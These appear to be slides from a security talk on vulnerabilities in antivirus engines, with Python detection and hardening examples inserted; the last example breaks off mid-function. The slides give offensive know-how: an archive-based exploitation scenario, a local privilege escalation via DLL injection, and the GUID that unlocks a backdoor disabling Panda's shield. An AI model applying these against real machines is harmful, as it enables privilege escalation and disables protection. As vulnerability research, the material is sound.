Antivirus Engines 



■ Common features of AV engines: 

- Written in C/C++. 

- Signature based engine + heuristics. 

- On-access scanners. 

- Command line/GUI on-demand scanners. 

- Support for compressed file archives. 

- Support for packers. 

- Support for miscellaneous file formats. 

■ Advanced common features: 

- Packet filters and firewalls. 

- Drivers to protect the product, anti-rootkits, etc... 

- Anti-exploiting toolkits. 



Antivirus products or engines 



■ An antivirus engine is just the core, the kernel, of an 
antivirus product. 

- Some antivirus engines are used by multiple products. 

■ For example, BitDefender is the most widely used 
antivirus kernel. 

■ It's used by many products like G-Data, eScan, F-Secure, 
etc... 

■ Most "big" antivirus companies have their own engine, 
but not all. And some companies, like F-Secure, 
integrate 3rd party engines in their products. 

■ In general, during this talk I will refer to AV engines, that is, 
to the kernels, except when the word "product" is specified. 



Attack surface 



■ Fact: installing an application on your computer makes 
you a bit more vulnerable. 

- You just increased your attack surface. 

- If the application is local: your local attack surface 
increased. 

- If the application is remote: your remote attack surface 
increased. 

■ If your application runs with the highest privileges, 
installs kernel drivers, a packet filter and tries to 
handle anything your computer may do... 

- Your attack surface dramatically increased. 



Myths and reality 



■ Antivirus propaganda: 

- "We make your computer safer with no performance 
penalty!" 

- "We protect against unknown zero day attacks!" 

■ Reality: 

- AV engines make your computer more vulnerable, 
with a varying degree of performance penalty. 

- The AV engine is as vulnerable to zero day attacks 
as the applications it tries to protect. 

■ And it can even weaken the operating system's 
exploit mitigations, by the way... 
Attacking antivirus engines 



■ AV engines, commonly, are written in non managed 
languages for performance reasons. 

- Almost all engines are written in C and/or C++, with only a few 
exceptions, like the old MalwareBytes, written in VB6 (!?). 

- It translates into buffer overflows, integer overflows, format 
strings, etc... 

■ Most AV engines install operating system drivers. 

- It translates into possible local escalation of privileges. 

■ AV engines must support a long list of file formats: 

- Rar, Zip, 7z, Xar, Tar, Cpio, Ole2, Pdf, Chm, Hlp, PE, Elf, 
Mach-O, Jpg, Png, Bz, Gz, Lzma, Tga, Wmf, Ico, Cur... 

- It translates into bugs in the parsers of such file formats. 



Attacking antivirus engines 



■ AV engines not only need to support such a large list of 
file formats, they also need to do this quickly and 
better than the vendor. 

- If an exploit for a new file format appears, customers will 
ask for support for such files as soon as possible. The 
longer it takes, the higher the odds of a customer 
moving on to another vendor. 

■ The producer doesn't need to "support" malformed files. 
The AV engine actually needs to do so. 

- The vendor needs to handle malformed files, but only to refuse 
them, as repairing such files is an open door for vulnerabilities. 

- Example: Adobe Acrobat. 



Attacking antivirus engines 



■ Most (if not all...) antivirus engines run with the highest 
privileges: root or local system. 

- If one can find a bug and write an exploit for the AV engine, 
(s)he just won root or system privileges. 

■ Most antivirus engines update via HTTP-only protocols: 

- If one can MITM the connection (for example, in a LAN) one 
can install new files and/or replace existing installation files. 

- It often translates into completely owning the machine with the 
AV engine installed, as updates are not commonly signed. 
Yes. They aren't. 

- I will show later one of the many vulnerable products... 
Vulnerabilities in AV engines 



■ I started around the end of July/beginning of August to find 
vulnerabilities, for fun, in some AV engines. 

- In my spare time, some hours from time to time. 

■ Found remote and local vulnerabilities in 14 AV 
engines or AV products. 

- Most of them in the first 2 months. 

- I tested ~17 engines (I think, I honestly do not 
remember). 

- It says it all. 

■ I'll talk about some of the vulnerabilities I discovered. 
The following are just a few of them... 



AV engines vulnerabilities 



■ Avast: Heap overflow in RPM (reported, fixed and paid Bug Bounty) 

■ Avg: Heap overflow with Cpio (fixed...)/Multiple vulnerabilities with packers 

■ Avira: Multiple remote vulnerabilities 

■ BitDefender: Multiple remote vulnerabilities 

■ ClamAV: Infinite loop with a malformed PE (reported & fixed) 

■ Comodo: Heap overflow with Chm 

■ DrWeb: Multiple remote vulnerabilities (vulnerability with updating engine fixed) 

■ ESET: Integer overflow with PDF (fixed)/Multiple vulnerabilities with packers 

■ F-Prot: Heap overflows with multiple packers 

■ F-Secure: Multiple vulnerabilities in Aqua engine (all the F-Secure own bugs fixed) 

■ Panda: Multiple local privilege escalations (reported and partially fixed) 

■ eScan: Multiple remote command injection (all fixed? LOL, I doubt...) 

■ And many more... 



How to find such vulnerabilities? 



■ In my case I used, initially, Nightmare, a fuzzing testing suite of 
my own. 

■ Downloaded all the AV engines with a Linux version I was able 
to find. 

- The core is always the same, with the only exception of some 
heuristic engines. 

- Also used some tricks to run Windows-only AV engines in Linux. 

■ Fuzzed the command line tool of each AV engine by simply 
using radamsa + the testing suite of ClamAV, many different 
EXE packers and some random file formats. 

- Results: Dozens of remotely exploitable vulnerabilities. 

■ Also, I performed basic local and remote checks: 

- ASLR, null ACLs, updating protocol, network services, etc... 



Fuzzing statistics 



■ A friend of mine convinced me to write a fuzzer and do 
a "Fuzzing explained" like talk for a private conference. 

- Really simple fuzzing engine with a max. of 10 nodes. 

- I'm poor... I cannot "start relatively small, with 
300 boxes" like Google people do. 

■ Used this fuzzing suite to fuzz various Linux based AV 
engines, those I was able to run and debug. 

■ For that specific talk I did fuzz/test the following ones: 

- BitDefender, Comodo, F-Prot, F-Secure, Avast, 
ClamAV, AVG. 

■ Results... 



Initial experiment results 



■ ClamAV: 1 Remote DoS with a malformed icon 
resource directory in a PE. 

■ Avast: One possible RCE due to an uninitialized 
variable in code handling RPM archives. 

■ F-Secure: One memory exhaustion bug with CPIO. 

■ Comodo: 2 heap overflows, one handling CHM files. 

■ F-Prot: Armadillo, PECompact, ASPack and Yoda's Protector 
unpackers heap overflows. 

■ AVG: CPIO and XAR heap overflows. 

■ BitDefender: Amazing number of bugs. Many likely 
exploitable. 
Exploiting AV engines 



What will be briefly covered: 

- Remote exploitation. 

What will not be: 

- Local exploitation of local user-land or kernel-land 
vulnerabilities. 

- I have no knowledge about kernel-land, sorry. 

- Later on, I will discuss some local vulnerability and 
give details about how to exploit it, but it isn't kernel 
stuff and is too easy to exploit. 



Exploiting AV engines 



■ Exploiting an AV engine is like exploiting any 
other client-side application. 

- It's not like exploiting a browser or a PDF reader. 

- It's more like exploiting an Office file format. 

■ Exploiting memory corruptions in client-side 
applications remotely can be quite hard 
nowadays due to ASLR. 

- However, AV engines make too many mistakes 
too often so, don't worry ;) 



Exploiting AV engines 



■ In general, AV engines are all compiled with 
ASLR enabled. 

■ But it's common that only the core modules are 
compiled with ASLR. 

- Not the GUI related programs and libraries, for 
example. 

■ Some libraries of the core of some AV engines 
are not ASLR enabled. 

- Check your target/own product, there isn't only 
one ;) 



Exploiting AV engines 



Even in "major" AV engines... 

- ...there are non ASLR enabled modules. 

- ...there are RWX pages at fixed addresses. 

- ...they disable DEP. 

Under certain conditions, of course. 
The condition, often, is the emulator. 



Exploiting AV engines 



■ The x86 emulator is a key part of an AV engine. 

■ It's used to unpack samples in memory, to 
determine the behaviour of an executable 
program, etc... 

■ Various AV engines create RWX pages at fixed 
addresses and disable DEP as long as the 
emulator is used. 

- Very common. Does not apply to only some random 
AV engine. 



Exploiting AV engines (more tips) 



■ By default, an AV engine will try to unpack 
compressed files and scan the files inside. 

■ A compressed archive file (zip, tgz, rar, ace, 
etc..) can be created with several files inside. 

■ The following is a common AV engines 
exploitation scenario: 

- Send a compressed zip file. 

- The very first file inside forces the emulator to be 
loaded and used. 

- The 2nd one is the real exploit. 



Exploiting AV engines 



■ AV engines implement multiple emulators. 

■ There are emulators for x86, AMD64, ARM, JavaScript, 
VBScript, ... in most of the "major" AV engines. 

■ The emulators, as far as I can tell, cannot be used to 
perform heap spraying, for example. But they expose a 
considerable attack surface. 

- It's common to find memory leaks inside the emulators, 
especially in the JavaScript engine. 

- They can be used to construct complex exploits, as we have 
a programming interface to craft inputs to the AV engine. 



Exploiting AV engines: Summary 



■ Exploiting AV engines is not different from exploiting other 
client-side applications. 

■ They don't have/offer any special self-protection. They rely 
on the operating system features (ASLR/DEP) and nothing 
else. 

- And sometimes they even disable such features. 

■ There are programming interfaces for exploit writers: 

- The emulators: x86, AMD-64, ARM, JavaScript, ... usually. 

■ Multiple files doing different actions each can be sent in 
one compressed file as long as the order inside it is kept. 

■ Owning the AV engine means getting root or system in all 
AV engines I tested. There is no need for a sandbox 
escape, in general. 
Details about some vulnerabilities in 
AV engines and products... 




[Comic image] Extracted from http://theoatmeal.com/comics/qrunn 

Copyright © Matthew Inman 



Disclaimer 



■ I'm only showing a few of my vulnerabilities. 

- I have the bad habit of eating 3 times a day... 

■ I contacted 5 vendors for different reasons: 

- Avast. They offer a Bug Bounty. Well done guys! 

- ClamAV. Their antivirus is Open Source. 

- Panda. I have close friends there. 

- Ikarus, ESET and F-Secure. They contacted me and asked 
for help nicely. 

■ I do not "responsibly" contact irresponsible multi-million 
dollar companies. 

- I don't give my research for free. 

- Audit your products... 



Local Escalation of Privileges 



Example: Panda Multiple local EoPs 



■ In the product Global Protection 2013 there 
were various processes running as SYSTEM. 

■ Two of those processes had a NULL process 
ACL: 

- WebProxy.EXE and SrvLoad.EXE 

■ We can use CreateRemoteThread to inject a 
DLL, for example. 

■ Two very easy local escalation of privileges. 

■ But the processes were "protected" by the 
shield. 



Example: Panda Multiple local EoPs 



■ Another terrible bug: The Panda's installation 
directory had write privileges for all users. 

■ However, again, the directory was "protected" 
by the shield... 

■ What is the fucking shield? 



Example: Panda Multiple local EoPs 



■ The Panda shield is a driver that protects some 
Panda owned processes, the program files 
directory, etc... 

■ It reads some registry keys to determine if the 
shield is enabled or disabled. 

- But... the registry key is world writeable. 

■ Also, it's funny, but there is a library 
(pavshld.dll) with various exported functions... 



Example: Panda Multiple local EoPs 



■ All exported functions have human readable names. 

- All but the first 2 functions. They are called PAVSHLD_001 
and 002. 

■ Decided to reverse engineer them for obvious reasons... 

■ The 1st function is a backdoor to disable the shield. 

■ It receives only 1 argument, a "secret key" (GUID): 

- ae217538-194a-4178-9a8f-2606b94d9f13 

■ If the key is correct, then the corresponding registry keys 
are written. 

■ Well, it's easier than writing the registry entries yourself... 



MOAR PANDAZ 



■ There are more stupid bugs in this AV engine... 

■ For example, no library is compiled with ASLR 
enabled. 

■ One can write a reliable exploit for Panda 
without any real big effort. 

■ And, also, one can write an exploit targeting 
Panda Global Protection users for any program. 

■ Why? Because the product injects 3 libraries 
without ASLR enabled in all processes. Yes. 



Panda 



■ I reported the vulnerabilities because I have 
friends there. 

■ Some of them are (supposedly) fixed, others 
not... 

- The shield backdoor. 

- The permissions of the Panda installation directory. 



ASLR related 
(Address Space Layout Randomization) 



ASLR disabled 



■ We already discussed that Panda Global 
Protection doesn't enable ASLR for all modules. 

■ Do you believe this is an isolated problem of 
just one antivirus product? 

■ As it is common with antivirus products/ 
engines, such problems are not specific... 



One example... 



Forticlient 



The process av_task.exe is the actual AV 
scanner... 



[Process Explorer screenshot: av_task.exe (Fortinet Inc.) and its loaded modules. Only the data files locale.nls and mdare_sig show "n/a" in the ASLR column; libeay32.dll (OpenSSL Shared Library, 1.0.1.5), av_task.exe, utilsdll.dll, libavr.dll (AV repair library), mdare.dll (Malware Detection and Removal Engine) and libav.dll (AV Engine Library) under C:\Program Files\Fortinet\FortiClient\ show it blank.] 
Forticlient 



■ Most libraries and binaries in Forticlient don't 
have ASLR enabled. 

- Exploiting Forticlient with so many non ASLR 
enabled modules once a bug is found is trivial. 

■ You may think that this is a problem that doesn't 
happen to the "big" ones... 

- Think again. 
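The Process Explorer ASLR column in the screenshots reads one header field; as an added example (not code from the talk or from any vendor), here is that check in Python: it parses the PE headers for IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (ASLR) and NX_COMPAT (DEP) and also flags images whose relocations were stripped, which the loader cannot move even when the flag is set. The `build_minimal_pe` helper constructs header-only test images; the module names in the `__main__` block are constructed placeholders.

```python
"""Report which PE modules opt in to ASLR/DEP, like Process Explorer's ASLR column.
Added example for this page; constructed inputs only, no vendor code."""
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # image may be relocated at load (ASLR)
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # image is DEP compatible
IMAGE_FILE_RELOCS_STRIPPED = 0x0001             # no .reloc data: image cannot be rebased


def pe_mitigations(data: bytes) -> dict:
    """Parse the DOS/COFF/optional headers of a PE image held in memory and
    return which exploit mitigations it opts in to."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: bad e_lfanew or PE signature")
    coff = e_lfanew + 4
    size_of_optional, characteristics = struct.unpack_from("<HH", data, coff + 16)
    opt = coff + 20
    # DllCharacteristics sits at offset 70 in both PE32 (0x10B) and PE32+ (0x20B).
    if size_of_optional < 72 or opt + 72 > len(data):
        raise ValueError("optional header too short")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    relocs_stripped = bool(characteristics & IMAGE_FILE_RELOCS_STRIPPED)
    wants_aslr = bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
    return {
        "pe32plus": magic == 0x20B,
        # The flag alone is not enough: without relocations the loader cannot move it.
        "aslr": wants_aslr and not relocs_stripped,
        "dep": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "relocs_stripped": relocs_stripped,
    }


def modules_without_aslr(modules: dict) -> list:
    """Given {name: image bytes}, return the names that would show a blank
    ASLR column, sorted for stable output."""
    return sorted(name for name, image in modules.items()
                  if not pe_mitigations(image)["aslr"])


def build_minimal_pe(dll_characteristics: int, file_characteristics: int = 0x0102) -> bytes:
    """Construct a header-only PE32 image for testing (constructed input, not a real binary).
    0x0102 = IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 96, file_characteristics)
    opt = bytearray(96)                              # PE32 optional header, no data directories
    struct.pack_into("<H", opt, 0, 0x10B)            # Magic: PE32
    struct.pack_into("<I", opt, 28, 0x00400000)      # ImageBase
    struct.pack_into("<H", opt, 68, 2)               # Subsystem: Windows GUI
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # Constructed sample set: one hardened module, one with no flags, one that
    # sets DYNAMIC_BASE but had its relocations stripped (so it still cannot move).
    sample = {
        "hardened.dll": build_minimal_pe(0x0140),
        "legacy.dll": build_minimal_pe(0x0000),
        "stripped.dll": build_minimal_pe(0x0040, file_characteristics=0x0103),
    }
    for name, image in sample.items():
        print(name, pe_mitigations(image))
    print("no ASLR:", modules_without_aslr(sample))
```

To audit a real installation, feed `pe_mitigations` the bytes of each module on disk; a loaded module with `aslr` False is exactly what the blank column above means.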



2 random AVs nobody uses... 



[Vendor logos of the two products discussed next: Kaspersky and BitDefender] 



Kaspersky 



■ Before SyScan 2014 Singapore, the library 
avzkrnl.dll and the module vlns.kdl, a vulnerability 
scanner (LOL), were not ASLR enabled. 

■ One can write a reliable exploit for Kaspersky 
AV without any real effort. 



[Process Explorer screenshot: avp.exe (Kaspersky Anti-Virus, Kaspersky Lab ZAO) and its loaded modules. vlns.kdl.317df7c0eff093... ("Vulnerability scanner", C:\ProgramData\KasperskyLab\PURE13\Bases\Cache\) and avzkrnl.dll ("AVZ Kernel", C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\) show a blank ASLR column.] 


Kaspersky 



■ After SyScan 2014 Singapore, after making those 
ASLR bypasses publicly available to anybody, they 
still didn't fix them. 

■ I don't know what to say... But it seems they simply 
don't care, like most of the AV companies in the 
industry. 

- Why bother fixing this issue if the scanner is running as 
system with the highest integrity level and without any 
kind of sandboxing? 



BitDefender 



It's kind of easier to write an exploit for BitDefender... 




[Process Explorer screenshot: updatesrv.exe (Bitdefender Update Service) and vsserv.exe (Bitdefender Security Service, 17.25.0.1071), annotated by the author:] 

"Security service" my ass... 

[Module list of vsserv.exe: bdcore.dll (BitDefender Core, 11.0.1.6), npcomm.dll, framework.dll, gzfltdp.dll, bdutils.dll, accessal.dll, scansp.dll, quarcore.dll, wsutils.dll, wspack.dll, wslib.dll, otcore.dll, txmlutil.dll, bdpop3p.dll, bdpredir.dll, mimepack.dll, wsc.dll, bdsmtpp.dll, bdelev.dll, bdusers.dll, ipm.dll, ycryptp.dll, the ashttp*.mdl antispam plugins and asregex.dll, all with a blank ASLR column; only Microsoft's profapi.dll (C:\Windows\System32) shows ASLR.] 



■ BKAV is a Vietnamese antivirus product. 

■ Gartner recognizes it as a "Cool vendor in 
Emerging Markets". 

■ I recognize it as a "Cool antivirus for writing 
targeted exploits"... 



They don't have ASLR enabled for their services. 



[Process Explorer screenshot: BkavSystemService.exe (Bkav System Service) and BkavService.exe (Bkav Service), Bkav Corporation, running as services; the Bkav scan module DLL and Corelib.dll ("Core library") under C:\Program Files\BkavPro\System\ show a blank ASLR column.] 



And, like Panda, they inject a non ASLR 
enabled library system wide, the Bkav "firewall" 
engine... 



[Process Explorer screenshot: explorer.exe with BkavFirewallEngine.dll (Bkav Firewall Engine, Bkav Corporation, C:\Program Files\BkavPro\System\Firewall\) loaded and a blank ASLR column, next to Microsoft's wkscli.dll (Workstation Service Client DLL), which shows ASLR.] 

...miserably failing at securing your computer. 

BTW, this vulnerability was made PUBLIC 
months ago, in SyScan 2014 Singapore. 



AV developers writing security software 




Remote Denial of Service 



Examples: ClamAV DoS 

There is a bug in ClamAV scanning icon resource 
directories. 

■ If the number is too big, ClamAV would loop almost 
forever. 

■ Fixed by adding more limits to the engine. 

■ Found via dumb ass fuzzing. 

■ Reported. Because it's Open Source... 

■ The vulnerability was nicely handled by the ClamAV 
team (now Cisco). 
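The fix class described here (bounding the parser by what the file can actually hold), as an added example that is not ClamAV's code: a walk over a PE resource directory tree that rejects entry counts larger than the section, nesting deeper than type/name/language, and cycles through the OffsetToData pointers. The sections it walks are constructed in the same block (a valid two-icon tree, a header claiming 0xFFFF entries, and a root that points back to itself).

```python
"""Bounded walk of a PE resource directory tree (the structure ClamAV was looping on).
Added example for this page; not ClamAV's code. Input is the raw .rsrc section bytes."""
import struct

RESOURCE_DIR_HDR = 16     # sizeof(IMAGE_RESOURCE_DIRECTORY)
RESOURCE_ENTRY = 8        # sizeof(IMAGE_RESOURCE_DIRECTORY_ENTRY)
RESOURCE_DATA_ENTRY = 16  # sizeof(IMAGE_RESOURCE_DATA_ENTRY)
SUBDIR_FLAG = 0x80000000  # high bit of OffsetToData: points to a subdirectory


class ResourceLimitError(Exception):
    """Raised when the tree is malformed or exceeds the scanner's limits."""


def walk_resources(section: bytes, max_depth: int = 3, max_entries: int = 4096) -> dict:
    """Count directories and data entries, refusing trees whose entry counts cannot fit
    in the section, that nest deeper than type/name/language, that revisit a directory
    (a cycle), or that exceed max_entries in total."""
    visited = set()
    stats = {"directories": 0, "entries": 0, "data_entries": 0}

    def walk(off: int, depth: int) -> None:
        if depth > max_depth:
            raise ResourceLimitError("nesting deeper than %d at 0x%x" % (max_depth, off))
        if off in visited:
            raise ResourceLimitError("cycle: directory 0x%x already visited" % off)
        visited.add(off)
        if off + RESOURCE_DIR_HDR > len(section):
            raise ResourceLimitError("directory header at 0x%x outside section" % off)
        named, ids = struct.unpack_from("<HH", section, off + 12)
        count = named + ids
        # The count comes from the file; bound it by what the section can hold
        # before trusting it as a loop limit.
        if off + RESOURCE_DIR_HDR + count * RESOURCE_ENTRY > len(section):
            raise ResourceLimitError("%d entries at 0x%x exceed section size" % (count, off))
        stats["directories"] += 1
        stats["entries"] += count
        if stats["entries"] > max_entries:
            raise ResourceLimitError("more than %d entries in total" % max_entries)
        for i in range(count):
            entry_off = off + RESOURCE_DIR_HDR + i * RESOURCE_ENTRY
            _name, target = struct.unpack_from("<II", section, entry_off)
            if target & SUBDIR_FLAG:
                walk(target & 0x7FFFFFFF, depth + 1)
            else:
                if target + RESOURCE_DATA_ENTRY > len(section):
                    raise ResourceLimitError("data entry at 0x%x outside section" % target)
                stats["data_entries"] += 1

    walk(0, 0)
    return stats


def rejects(section: bytes) -> bool:
    """True if the walker refuses the section instead of walking it."""
    try:
        walk_resources(section)
        return False
    except ResourceLimitError:
        return True


def _directory(entries) -> bytes:
    """Constructed IMAGE_RESOURCE_DIRECTORY with id entries [(id, OffsetToData), ...]."""
    hdr = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, len(entries))
    return hdr + b"".join(struct.pack("<II", i, t) for i, t in entries)


def build_valid_tree() -> bytes:
    """Constructed RT_ICON tree: type 3 -> icons 1 and 2 -> language 0x409 -> data."""
    return (_directory([(3, SUBDIR_FLAG | 0x18)])                             # root, 24 bytes
            + _directory([(1, SUBDIR_FLAG | 0x38), (2, SUBDIR_FLAG | 0x50)])  # names, 32 bytes
            + _directory([(0x409, 0x68)])                                      # icon 1 languages
            + _directory([(0x409, 0x78)])                                      # icon 2 languages
            + struct.pack("<IIII", 0x3000, 0x2E8, 0, 0)                        # data entry at 0x68
            + struct.pack("<IIII", 0x3300, 0x2E8, 0, 0))                       # data entry at 0x78


def build_huge_count() -> bytes:
    """Constructed root directory claiming 0xFFFF entries with none present."""
    return struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 0xFFFF)


def build_cyclic_tree() -> bytes:
    """Constructed root whose only entry points back to the root: an unbounded
    loop for a walker that trusts the offsets."""
    return _directory([(3, SUBDIR_FLAG | 0)])
```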



Decompression bombs (multiple AVs) 



■ Do you remember them? If I remember 
correctly, the 1st discussion in Bugtraq about it 
was in 2001. 

- A compressed file with many compressed files 
inside or with really big files inside. 

- It can be considered a remote denial of service. 

■ Do you think AV engines are not vulnerable any 
more to such bugs after more than 10 years? 

- In this case, you're wrong. 

- Look at the following table.... 



Failing AVs 




* Sophos finishes after ~30 seconds. In a "testing" machine with 16 logical CPUs and 32 GB 
of RAM. 

** Kaspersky creates a temporary file. A 32GB dumb file is a ~3MB 7z compressed one. 

*** In my latest testing, ESET finishes after 1 minute with each file in my "small testing 
machine". 
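The defensive side of the table above, as an added example that is not code from the talk or from any of the tested products: a zip scanner that inflates members under a byte budget, a per-member expansion ratio, an entry cap and a nesting depth, so a bomb is refused instead of filling memory or the temporary directory. The archives it scans are constructed inline (a benign one, a 16 MiB-of-zeros member, and nested zips); the limit values are assumptions chosen for the example.

```python
"""Scan a zip archive under a decompression budget instead of inflating it blindly.
Added example for this page; not any vendor's code. Standard library only."""
import io
import zipfile

CHUNK = 64 * 1024


class ArchiveBombError(Exception):
    """The archive would cost more to inflate than the scanner allows."""


def scan_zip(data: bytes, max_total: int = 8 * 1024 * 1024, max_ratio: int = 200,
             max_entries: int = 1000, max_depth: int = 2, depth: int = 0) -> dict:
    """Inflate each member in chunks, stop as soon as the running total exceeds
    max_total, and recurse into nested zips up to max_depth."""
    if depth > max_depth:
        raise ArchiveBombError("archive nested deeper than %d levels" % max_depth)
    zf = zipfile.ZipFile(io.BytesIO(data))        # raises BadZipFile for non-zip input
    infos = zf.infolist()
    if len(infos) > max_entries:
        raise ArchiveBombError("%d members, limit is %d" % (len(infos), max_entries))
    # Cheap pre-check on the central directory. Those sizes are attacker-controlled,
    # so the streaming counter below is the check that really protects the scanner.
    if sum(i.file_size for i in infos) > max_total:
        raise ArchiveBombError("headers already claim more than %d bytes" % max_total)
    stats = {"members": len(infos), "inflated": 0, "nested": 0}
    for info in infos:
        produced, nested_buf = 0, None
        with zf.open(info) as member:
            chunk = member.read(CHUNK)
            if chunk[:4] == b"PK\x03\x04":          # member is itself a zip: keep it to recurse
                nested_buf = bytearray()
            while chunk:
                produced += len(chunk)
                stats["inflated"] += len(chunk)
                if stats["inflated"] > max_total:
                    raise ArchiveBombError("output exceeded %d bytes while inflating %s"
                                           % (max_total, info.filename))
                if nested_buf is not None:
                    nested_buf += chunk
                chunk = member.read(CHUNK)
        ratio = produced // max(info.compress_size, 1)
        if ratio > max_ratio:
            raise ArchiveBombError("%s expands %dx, limit is %dx"
                                   % (info.filename, ratio, max_ratio))
        if nested_buf is not None:
            # The inner archive only gets whatever budget is left.
            inner = scan_zip(bytes(nested_buf), max_total - stats["inflated"], max_ratio,
                             max_entries, max_depth, depth + 1)
            stats["inflated"] += inner["inflated"]
            stats["nested"] += 1 + inner["nested"]
    return stats


def is_bomb(data: bytes) -> bool:
    """True when the scanner refuses the archive."""
    try:
        scan_zip(data)
        return False
    except ArchiveBombError:
        return True


def make_zip(members: dict) -> bytes:
    """Constructed deflated archive from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


def benign_archive() -> bytes:
    return make_zip({"readme.txt": b"hello\n", "notes/a.txt": b"x" * 1000})


def bomb_archive() -> bytes:
    # 16 MiB of zeros deflates to a few KiB: past the 8 MiB budget and far over 200x.
    return make_zip({"big.bin": b"\0" * (16 * 1024 * 1024)})


def nested_archive(levels: int) -> bytes:
    """A zip wrapped in `levels` further zips (constructed)."""
    inner = make_zip({"leaf.txt": b"leaf"})
    for i in range(levels):
        inner = make_zip({"level%d.zip" % i: inner})
    return inner
```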







BitDefender engine 



■ BitDefender is a Romanian antivirus engine. 

■ Their AV core is the most widely distributed AV 
engine in other AV products. 

- To name a few: F-Secure, G-Data, eScan, 
LavaSoft, Immunet, ... 

■ It suffers from a number of vulnerabilities, like 
almost all other AV engines/products out there. 

■ Finding vulnerabilities in this engine is trivial. 

- Some easy examples... 



BitDefender bugs 



(Vulnerability fixed) Modifying 2 DWORDs in a PE file 
packed with the Shrinker packer used to crash it: 
[Hex dump screenshots: the original Shrinker3-packed PE and the modified copy, offsets 0x00006E30 to 0x00006EA0; the modified copy shows the two patched DWORDs as a run of FF bytes.]

Those bytes were used to calculate the file and section alignment of the new, in-memory, unpacked PE file.

When set to 0xFFFFFFFF and 0xFFFFFFF, both the file and the section alignment were computed as 0...



BitDefender bugs 



■ ...and their values were used, later on, in some arithmetic operations:

F68749BE mov     eax, [ecx+IMAGE_NT_HEADERS.OptionalHeader.FileAlignment]    ; calculated FileAlignment of the new PE file (will be 0)
F68749C1 add     esi, 28h
F68749C4 push    ebx
F68749C5 mov     ebx, [ecx+IMAGE_NT_HEADERS.OptionalHeader.SectionAlignment] ; calculated SectionAlignment of the new PE file (will be 0)
F68749C8 mov     [ebp+file_alignment], eax
F68749CB cmp     eax, 200h
F68749D0 jbe     short loc_F68749DA
F68749D2 mov     eax, 200h
F68749D7 mov     [ebp+file_alignment], eax
F68749DA
F68749DA loc_F68749DA:                        ; CODE XREF: sub_F68748D0+100
F68749DA lea     edx, [ebx-1]
F68749DD test    ebx, edx
F68749DF jz      short loc_F68749E3
F68749E1 mov     ebx, eax
F68749E3
F68749E3 loc_F68749E3:                        ; CODE XREF: sub_F68748D0+10F
F68749E3 xor     edx, edx
F68749E5 mov     eax, esi
F68749E7 div     ebx                          ; Divide by zero with SectionAlignment
F68749E9 test    edx, edx
F68749EB jz      short loc_F68749F1
F68749ED sub     ebx, edx
F68749EF add     esi, ebx
F68749F1
F68749F1 loc_F68749F1:                        ; CODE XREF: sub_F68748D0+11B
F68749F1 mov     ebx, [ebp+file_alignment]
F68749F4 xor     edx, edx
F68749F6 mov     eax, esi
F68749F8 div     ebx                          ; Divide by zero, with FileAlignment



Those 2 bugs were trivial to discover. But they failed to find them by themselves...
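The following is an added example, not BitDefender's code: a Python re-creation of the alignment handling visible in the disassembly above (clamp FileAlignment to 0x200, fall back to FileAlignment when SectionAlignment is not a power of two, then divide), a minimal constructed PE32 header to feed it, and a checked version of the same step. The raw offset 0x28 and the direct header reads are assumptions standing in for the unpacker's own inputs; the point is that the power-of-two test `x & (x - 1)` accepts 0, so a zero alignment reaches the DIV.

```python
"""Added example, not BitDefender's code: the alignment arithmetic behind the
divide-by-zero, re-created in Python, next to a version that validates first."""
import struct

PE_SIGNATURE = b"PE\0\0"
COFF_HEADER_SIZE = 20
# Offsets inside the PE32 optional header (PE/COFF specification).
SECTION_ALIGNMENT_OFF = 32
FILE_ALIGNMENT_OFF = 36

def read_alignments(image):
    """Return (FileAlignment, SectionAlignment) from a PE32 image in memory."""
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("not a PE image")
    opt = e_lfanew + 4 + COFF_HEADER_SIZE
    section_alignment, file_alignment = struct.unpack_from("<II", image, opt + SECTION_ALIGNMENT_OFF)
    return file_alignment, section_alignment

def engine_alignments(file_alignment, section_alignment):
    """The sanitisation the disassembly performs before dividing: FileAlignment is
    clamped to 0x200 and SectionAlignment is replaced by FileAlignment when it is
    not a power of two. 0 & (0 - 1) == 0, so a zero alignment passes untouched."""
    fa = file_alignment if file_alignment <= 0x200 else 0x200
    sa = section_alignment
    if sa & (sa - 1):
        sa = fa
    return fa, sa

def round_up(value, alignment):
    """The DIV-and-adjust sequence; raises ZeroDivisionError for alignment 0,
    the Python counterpart of the faulting DIV instruction."""
    remainder = value % alignment
    return value if remainder == 0 else value + alignment - remainder

def vulnerable_layout(image, raw_offset=0x28):
    """Next-section placement the way the unpacker computed it."""
    fa, sa = engine_alignments(*read_alignments(image))
    return round_up(round_up(raw_offset, sa), fa)

def checked_alignments(file_alignment, section_alignment):
    """Hardened: enforce the spec's constraints before any arithmetic."""
    def is_pow2(x):
        return x != 0 and (x & (x - 1)) == 0
    if not (is_pow2(file_alignment) and 0x200 <= file_alignment <= 0x10000):
        raise ValueError("bad FileAlignment 0x%x" % file_alignment)
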